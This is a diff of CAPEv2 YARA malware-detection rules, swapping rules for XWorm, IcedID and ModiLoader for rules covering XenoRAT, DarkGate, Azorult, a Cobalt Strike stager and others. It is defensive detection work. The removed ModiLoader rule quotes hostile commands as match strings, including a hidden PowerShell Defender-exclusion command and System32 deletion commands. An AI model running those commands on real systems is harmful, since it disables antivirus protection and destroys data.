+		$decrypt_config1 = {FF 37 83 C3 EC 53 8B 5D 0C 8D 43 14 50 6A 14 53 E8 ?? ?? ?? ?? 83 C4 14 85 C0 ?? 26 ?? ?? 86 20 02 00 00 66 85 C0 ?? ?? FF 37 FF 75 10 53}
+		$decrypt_config2 = {8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C 08 00 00}
+		$decrypt_config3 = {6A 13 8B CE 8B C3 5A 8A 18 3A 19 75 05 40 41 4A 75 F5 0F B6 00 0F B6 09 2B C1 74 05 83 C8 FF EB 0E}
+		$call_decrypt = {83 7D ?? 00 56 74 0B FF 75 10 8B F3 E8 [4] 59 8B 45 0C 83 F8 28 72 19 8B 55 08 8B 37 8D 48 EC 6A 14 8D 42 14 52 E8}
 
 	condition:
-		uint16( 0 ) == 0x8B55 and all of them
+		uint16( 0 ) == 0x5A4D and any of ( $* )
 }
-rule CAPE_Xworm
+rule CAPE_Xenorat
 {
 	meta:
-		description = "XWorm Config Extractor"
-		author = "kevoreilly"
-		id = "0f55dbfb-c239-53f2-a1e0-bfa494558d6e"
-		date = "2023-11-07"
-		modified = "2023-11-07"
+		description = "No description has been set in the source file - CAPE"
+		author = "jeFF0Falltrades"
+		id = "9708158d-06fc-5991-a084-df2bfe1d5c96"
+		date = "2024-10-09"
+		modified = "2024-10-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/XWorm.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "d8e103f3470e83d71cd4992b74698c0721b8a69d764fdb7a4543997b2853014a"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/XenoRAT.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "26f520fb69a52d05786fac0e9e38f5db9601da0a3e7768e00975a9684f3560ef"
 		score = 75
-		quality = 70
+		quality = 66
 		tags = ""
-		cape_options = "bp0=$decrypt+11,action0=string:r10,count=1,typestring=XWorm Config"
+		cape_type = "XenoRAT payload"
 
 	strings:
-		$decrypt = {45 33 C0 39 09 FF 15 [4] 48 8B F0 E8 [4] 48 8B C8 48 8B D6 48 8B 00 48 8B 40 68 FF 50 ?? 90}
+		$str_xeno_rat_1 = "xeno rat" wide ascii nocase
+		$str_xeno_rat_2 = "xeno_rat" wide ascii nocase
+		$str_xeno_update_mgr = "XenoUpdateManager" wide ascii
+		$str_nothingset = "nothingset" wide ascii
+		$byte_enc_dec_pre = { 1f 10 8d [4] (0a | 0b) }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
 
 	condition:
-		any of them
+		4 of them and #patt_config >= 5
 }
-rule CAPE_Themida : FILE
+rule CAPE_Kronos : FILE
 {
 	meta:
-		description = "Themida detonation shim"
+		description = "Kronos Payload"
 		author = "kevoreilly"
-		id = "cd5c8b08-4864-57f7-b218-1bcb6892bea8"
-		date = "2024-09-11"
-		modified = "2024-09-11"
+		id = "921a939b-a037-5973-bd8e-f9f55fce7f0f"
+		date = "2020-07-02"
+		modified = "2020-07-02"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Themida.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "c4f1e01a3fe3cb66062ce03253bfe9edc09dc6f1a77db99b281106e8ceff9257"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Kronos.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "52ce9caf3627efe8ae86df6ca59e51e9f738e13ac0265f797e8d70123dbcaeb3"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "unhook-apis=NtSetInformationThread,force-sleepskip=0"
-		packed = "6337ff4cf413f56cc6c9a8e67f24b8d7f94f620eae06ac9f0b113b5ba82ea176"
+		cape_type = "Kronos Payload"
 
 	strings:
-		$code = {FC 31 C9 49 89 CA 31 C0 31 DB AC 30 C8 88 E9 88 D5 88 F2 B6 08 66 D1 EB 66 D1 D8 73 09}
+		$a1 = "user_pref(\"network.cookie.cookieBehavior\""
+		$a2 = "T0E0H4U0X3A3D4D8"
+		$a3 = "wow64cpu.dll" wide
+		$a4 = "Kronos" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and ( 2 of ( $a* ) )
 }
-rule CAPE_Icedidsyscallwritemem : FILE
+rule CAPE_Darkgate
 {
 	meta:
-		description = "IcedID 'syscall' packer bypass - direct write variant"
-		author = "kevoreilly"
-		id = "67935058-4191-587f-ad19-497defd0eef1"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		description = "DarkGate Payload"
+		author = "enzok"
+		id = "ce81f452-4096-51d6-97cc-624f9fbefa86"
+		date = "2024-02-26"
+		modified = "2024-02-26"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/IcedID.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "6b068106b038e9efeb9057cadf314d400c1ada1a1cc70336d3272da3a212c993"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/DarkGate.yar#L1-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "25c0e77a83676c6a18445f8df0b1f7a9148de5f64eeb532f9a4f4d4652dd8191"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$tokencheck+9,action0=jmp,count=0"
-		packed = "28075ecae5e224c06e250f2c949c826b81844bca421e9158a7a9e965a29ef894"
-		packed = "045dff9f14a03225df55997cb2ca74ff60ecaf317b9e033ea93386785db84161"
+		tags = ""
+		cape_type = "DarkGate Payload"
 
 	strings:
-		$tokencheck = {39 5D ?? 75 06 83 7D ?? 03 74 05 BB 01 00 00 00 41 89 1C ?? 48 8B 4D ?? 41 FF D?}
+		$part1 = {8B 55 ?? 8A 4D ?? 80 E1 3F C1 E1 02 8A 5D ?? 80 E3 30 81 E3 FF [3] C1 EB 04 02 CB 88 4C 10 FF FF 45 ?? 80 7D ?? 40}
+		$part2 = {8B 55 ?? 8A 4D ?? 80 E1 0F C1 E1 04 8A 5D ?? 80 E3 3C 81 E3 FF [3] C1 EB 02 02 CB 88 4C 10 FF FF 45 ?? 80 7D ?? 40}
+		$part3 = {8B 55 ?? 8A 4D ?? 80 E1 03 C1 E1 06 8A 5D ?? 80 E3 3F 02 CB 88 4C 10 FF FF 45}
+		$alphabet = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+="
+		$config1 = {B9 01 04 00 00 E8 [4] 8D 45}
+		$config2 = {8B 55 ?? 8D 45 ?? E8 [4] 8D 45 ?? 5? B? 06 00 00 00 B? 01 00 00 00 8B 45 ?? E8 [4] 8B 45 ?? B? [4] E8 [4] 75}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		($alphabet ) and ( any of ( $part* ) or all of ( $config* ) )
 }
-rule CAPE_Icedidhook
+rule CAPE_Buerloader : FILE
 {
 	meta:
-		description = "IcedID hook fix"
-		author = "kevoreilly"
-		id = "011c9cb7-8080-5f8a-9dca-6397e9bf7bf6"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		description = "No description has been set in the source file - CAPE"
+		author = "kevoreilly & Rony (@r0ny_123)"
+		id = "95a9b4d7-db1e-50cd-bc08-01e4e4fd6dc4"
+		date = "2022-05-31"
+		modified = "2022-05-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/IcedID.yar#L15-L25"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "fd62e0ed6f2a18472fa9336daee0e8a3a55e21779a8385394e85f96da928e24f"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/BuerLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "05c1f008f0a2bb8232867977fb23a5ae8312f10f0637c6265561052596319c29"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "ntdll-protect=0"
+		tags = "FILE"
+		cape_type = "BuerLoader Payload"
 
 	strings:
-		$hook = {C6 06 E9 83 E8 05 89 46 01 8D 45 ?? 50 FF 75 ?? 6A 05 56 6A FF E8 2D FA FF FF}
+		$trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31}
+		$decode = {8A 0E 84 C9 74 0E 8B D0 2A 0F 46 88 0A 42 8A 0E 84 C9 75 F4 5F 5E 5D C2 04 00}
+		$op = {33 C0 85 D2 7E 1? 3B C7 7D [0-15] 40 3B C2 7C ?? EB 02}
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Icedidpackera : FILE
+rule CAPE_Bitpaymer : FILE
 {
 	meta:
-		description = "IcedID export selection"
+		description = "BitPaymer Payload"
 		author = "kevoreilly"
-		id = "d793d8a1-0e17-56ad-933c-470e2290867b"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		id = "c139b514-a1ba-5d47-8f4d-8e60cddfe2ba"
+		date = "2019-11-27"
+		modified = "2019-11-27"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/IcedID.yar#L27-L40"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe"
-		logic_hash = "aa0681e7794546355e6d61f739c49035a493cdfca7e666531d74e3835ec44408"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/BitPaymer.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "6ae0dc9a36da13e483d8d653276b06f59ecc15c95c754c268dcc91b181677c4c"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_type = "BitPaymer Payload"
 
 	strings:
-		$init = "init"
-		$export = {48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 81 EC [2] 00 00 41 8B E9 49 8B F0 48 8B FA 48 8B D9}
-		$alloc = {8B 50 50 33 C9 44 8D 49 40 41 B8 00 30 00 00 FF 15 [4] 48 89 44 24 28 [0-3] 48 89 84 24 ?? 00 00 00 E9}
+		$decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57}
+		$antidefender = "TouchMeNot" wide
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Icedidpackerb : FILE
+rule CAPE_Magniber : FILE
 {
 	meta:
-		description = "IcedID export selection"
+		description = "Magniber Payload"
 		author = "kevoreilly"
-		id = "6bd0e64d-e60e-5cd2-af79-946a7f6dc9f5"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		id = "a704914f-2aa2-537d-975d-f8c23427951f"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/IcedID.yar#L42-L56"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "6517ef2c579002ec62ddeb01a3175917c75d79ceca355c415a4462922c715cb6"
-		logic_hash = "fde1e2c0124d180b2fa3d0675b35e8d78fdd7b06cd27e9228c148aa29ce30ee7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Magniber.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "1875754bdf98c1886f31f6c6e29992a98180f74d8fa168ae391e2c660d760618"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_type = "Magniber Payload"
 
 	strings:
-		$init = "init"
-		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 4C 24 08 41 55 41 56 41 57 48 81 EC ?? 00 00 00 B9 [2] 00 00 4C 8B EA E8}
-		$loop = {8B C2 48 8D 49 01 83 E0 07 FF C2 0F B6 44 30 ?? 30 41 FF 3B D5 72}
+		$a1 = {8B 55 FC 83 C2 01 89 55 FC 8B 45 FC 3B 45 08 7D 45 6A 01 6A 00 E8 26 FF FF FF 83 C4 08 89 45 F4 83 7D F4 00 75 18 6A 7A 6A 61 E8 11 FF FF FF 83 C4 08 8B 4D FC 8B 55 F8 66 89 04 4A EB 16}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Icedidpackerc : FILE
+rule CAPE_Sedreco : FILE
 {
 	meta:
-		description = "IcedID export selection"
+		description = "Sedreco encrypt function entry"
 		author = "kevoreilly"
-		id = "fddfd0d2-1bc0-56bb-b983-5850e17a3d0f"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		id = "5b9ee4af-50a4-597c-8fa5-f2094c312d23"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/IcedID.yar#L58-L71"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "c06805b6efd482c1a671ec60c1469e47772c8937ec0496f74e987276fa9020a5"
-		hash = "265c1857ac7c20432f36e3967511f1be0b84b1c52e4867889e367c0b5828a844"
-		logic_hash = "f1e75e380ab0947fdfda012b7a5077a1c2ef51163239846ab2dc29cac95ba166"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Sedreco.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "f735549606917f59a19157e604e54766e4456bc5d46e94cae3e0a3c18b52a7ca"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_type = "Sedreco Payload"
 
 	strings:
-		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 3A ED 74}
-		$alloc = {41 B8 00 10 00 00 8B D0 33 C9 66 3B ?? (74|0F 84)}
+		$encrypt1 = {55 8B EC 83 EC 2C 53 56 8B F2 57 8B 7D 08 B8 AB AA AA AA}
+		$encrypt2 = {55 8B EC 83 EC 20 8B 4D 10 B8 AB AA AA AA}
+		$encrypt64_1 = {48 89 4C 24 08 53 55 56 57 41 54 41 56 48 83 EC 18 45 8D 34 10 48 8B E9 B8 AB AA AA AA 4D 8B E1 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and $encrypt1 or $encrypt2 or $encrypt64_1
 }
-rule CAPE_Icedidpackerd : FILE
+rule CAPE_Kpot : FILE
 {
 	meta:
-		description = "IcedID export selection"
+		description = "Kpot Stealer"
 		author = "kevoreilly"
-		id = "df0ca4bd-1ea6-57ef-b85a-7ed0e2a20831"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		id = "724fd6ac-e734-5952-b459-01cbaffdb89d"
+		date = "2020-10-19"
+		modified = "2020-10-19"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/IcedID.yar#L73-L86"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "7b226f8cc05fa7d846c52eb0ec386ab37f9bae04372372509daa6bacc9f885d8"
-		logic_hash = "6685e0246f5a11ce0ca33447837de06506b447a5f8591423e2b76f2ab0274dc7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Kpot.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "75abaab9a10e8ac8808425c389238285ab9bd9cb76f0cd03cc1e35b3ea0a1b0f"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_type = "Kpot Payload"
 
 	strings:
-		$init = "init"
-		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 66 3B ED 74}
-		$load = {41 B8 00 80 00 00 33 D2 48 8B 4C [2] EB ?? B9 69 04 00 00 E8 [4] 48 89 84 [2] 00 00 00 66 3B ED 74}
+		$format = "%s | %s | %s | %s | %s | %s | %s | %d | %s"
+		$username = "username:s:"
+		$os = "OS: %S x%d"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Icedsleep : FILE
+rule CAPE_Blister : FILE
 {
 	meta:
-		description = "IcedID sleep bypass"
+		description = "Blister Loader"
 		author = "kevoreilly"
-		id = "d6bd708b-47bc-5620-b40e-8fe5f1a67ba4"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		id = "525fc600-2afc-5cf6-bf55-4ce0ea264dca"
+		date = "2023-09-20"
+		modified = "2023-09-20"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/IcedID.yar#L88-L99"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "0b1a8be95b1b8a3b066837f9e47561ee8202d741b39d64e626c0461c2fbf7c70"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Blister.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
+		hash = "d3eab2a134e7bd3f2e8767a6285b38d19cd3df421e8af336a7852b74f194802c"
+		logic_hash = "f26d85fdf0eb07e67fe38c43c5f6d024bfb7b2a333cb3411f5cdcff6bf5db12d"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "force-sleepskip=1"
-		packed = "e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7"
+		cape_type = "Blister Loader"
 
 	strings:
-		$sleep = {89 4C 24 08 48 83 EC 38 8B 44 24 40 48 69 C0 10 27 00 00 48 F7 D8 48 89 44 24 20 48 8D 54 24 20 33 C9 FF 15 [4] 48 83 C4 38 C3}
+		$protect1 = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7}
+		$protect2 = {48 83 C9 FF 48 8D 55 ?? FF D6 48 8D 87 [2] 00 00 48 8D 4D ?? FF D0}
+		$lock1 = {B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75}
+		$lock2 = {B8 FF FF FF 7F 41 BC 01 00 00 00 89 45 40 F0 FF 4D 40 49 2B C4 75}
+		$decode = {0F BE C0 49 03 CC 41 33 C1 44 69 C8 [4] 41 8B C1 C1 E8 0F 44 33 C8 8A 01 84 C0 75 E1 41 81 F9 [4] 74}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Modiloader : FILE
+rule CAPE_Azorult : FILE
 {
 	meta:
-		description = "ModiLoader detonation shim"
+		description = "Azorult Payload"
 		author = "kevoreilly"
-		id = "64f9aa51-d668-5d40-9781-c26970acf781"
-		date = "2025-01-31"
-		modified = "2025-01-31"
+		id = "ca76ec00-001f-56d0-bdbc-9dfd3239fba8"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/ModiLoader.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "1f0cbf841a6bc18d632e0bc3c591266e77c99a7717a15fc4b84d3e936605761f"
-		logic_hash = "9e64e0c40192cc832a1ffa7b3ac65a704596af82515d03706cd7aa1f4498f32f"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Azorult.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "4691cf48d513d1965416b0cce1b6e19c8f7b393a940afd68b7c6ca8c0d125d90"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "exclude-apis=NtAllocateVirtualMemory:NtProtectVirtualMemory"
+		cape_type = "Azorult Payload"
 
 	strings:
-		$epilog1 = {81 C2 A1 03 00 00 87 D1 29 D3 33 C0 5A 59 59 64 89 10 68}
-		$epilog2 = {6A 00 6A 01 8B 45 ?? 50 FF 55 ?? 33 C0 5A 59 59 64 89 10 68}
+		$code1 = {C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 00 00 00 8D 85 80 F5 FF FF 89 47 2C C7 47 30 00 08 00 00 8D 85 80 F1 FF FF 89 47 34 C7 47 38 00 04 00 00 57 68 00 00 00 90}
+		$string1 = "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\")"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Modiloaderold : FILE
+rule CAPE_Cobaltstrikestager
 {
 	meta:
-		description = "ModiLoader detonation shim"
-		author = "ditekSHen"
-		id = "2b3fd8ec-b672-574b-9b50-1a9ca9f43299"
-		date = "2025-01-31"
-		modified = "2025-01-31"
+		description = "Cobalt Strike Stager Payload"
+		author = "@dan__mayer <daniel@stairwell.com>"
+		id = "eedf71b1-9f27-5a6f-afe8-3ddae47f9a06"
+		date = "2023-01-18"
+		modified = "2023-01-18"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/ModiLoader.yar#L15-L53"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "fc006377e6d41515503b0b234ff87f59d930a7d9f8b32d2e072de79b9c52ddc4"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/CobaltStrikeStager.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "6a55b0c3ab5f557dfb7a3f8bd616ede1bd9b93198590fc9d52aa19c1154388c5"
 		score = 75
-		quality = 66
-		tags = "FILE"
-		cape_options = "ntdll-protect=0"
+		quality = 70
+		tags = ""
+		cape_type = "CobaltStrikeStager Payload"
 
 	strings:
-		$x1 = "*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@" fullword wide
-		$x2 = "dntdll" fullword wide
-		$x3 = "USERPROFILE" fullword wide
-		$s1 = "%s, ProgID: \"%s\"" ascii
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
-		$s3 = "responsetext" ascii
-		$s4 = "C:\\Users\\Public\\" ascii
-		$s5 = "[InternetShortcut]" fullword ascii
-		$c1 = "start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command \"Add-MpPreference -ExclusionPath 'C:\\Users'\" & exit" ascii nocase
-		$c2 = "mkdir \"\\\\?\\C:\\Windows \"" ascii nocase
-		$c3 = "mkdir \"\\\\?\\C:\\Windows \\System32\"" ascii nocase
-		$c4 = "ECHO F|xcopy \"" ascii nocase
-		$c5 = "\"C:\\Windows \\System32\" /K /D /H /Y" ascii nocase
-		$c6 = "ping 127.0.0.1 -n 6 > nul" ascii nocase
-		$c7 = "del /q \"C:\\Windows \\System32\\*\"" ascii nocase
-		$c8 = "rmdir \"C:\\Windows \\System32\"" ascii nocase
-		$c9 = "rmdir \"C:\\Windows \"" ascii nocase
-		$g1 = "powershell" ascii nocase
-		$g2 = "mkdir \"\\\\?\\C:\\" ascii nocase
-		$g3 = "\" /K /D /H /Y" ascii nocase
-		$g4 = "ping 127.0.0.1 -n" ascii nocase
-		$g5 = "del /q \"" ascii nocase
-		$g6 = "rmdir \"" ascii nocase
+		$smb = { 68 00 B0 04 00 68 00 B0 04 00 6A 01 6A 06 6A 03 52 68 45 70 DF D4 }
+		$http_x86 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 }
+		$http_x64 = { 49 BE 77 69 6E 69 6E 65 74 00 41 56 49 89 E6 4C 89 F1 41 BA 4C 77 26 07 }
+		$dns = { 68 00 10 00 00 68 FF FF 07 00 6A 00 68 58 A4 53 E5 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and ( all of ( $g* ) or ( 2 of ( $s* ) and 2 of ( $c* ) ) ) ) or ( all of ( $s* ) and ( 2 of ( $c* ) or all of ( $g* ) ) ) or ( 4 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) or ( all of ( $g* ) and 4 of ( $c* ) ) or 13 of them )
+		any of them
 }
-rule CAPE_Risepro : FILE
+rule CAPE_Rozena
 {
 	meta:
 		description = "No description has been set in the source file - CAPE"
-		author = "kevoreilly"
-		id = "63d9cb19-0688-5632-8477-ce9b7e986a55"
-		date = "2023-12-16"
-		modified = "2023-12-16"
+		author = "Kevin O'Reilly"
+		id = "38ca9da3-2a0e-500f-8eb8-9de69a7f2da5"
+		date = "2024-03-15"
+		modified = "2024-03-15"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/RisePro.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "1b69a1dd5961241b926605f0a015fa17149c3b2759fb077a30a22d4ddcc273f6"
-		logic_hash = "055ca8328923b91f93c116e4a856366356fa11155f4e9fde95da31129b51386a"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Rozena.yar#L1-L10"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "c415a8108b58a125a604031bb8d73b58a8aae5429b5b765e35fa8a4add9cd135"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$c2+15,action0=string:edx,bp1=$c2+41,action1=string:ecx,count=1"
+		tags = ""
+		cape_type = "Rozena Payload"
 
 	strings:
-		$decode1 = {8A 06 46 84 C0 75 F9 2B F1 B8 FF FF FF 7F 8B 4D ?? 8B 51 ?? 2B C2 3B C6 72 38 83 79 ?? 10 72 02 8B 09 52 51 56 53 51 FF 75 ?? 8B CF E8}
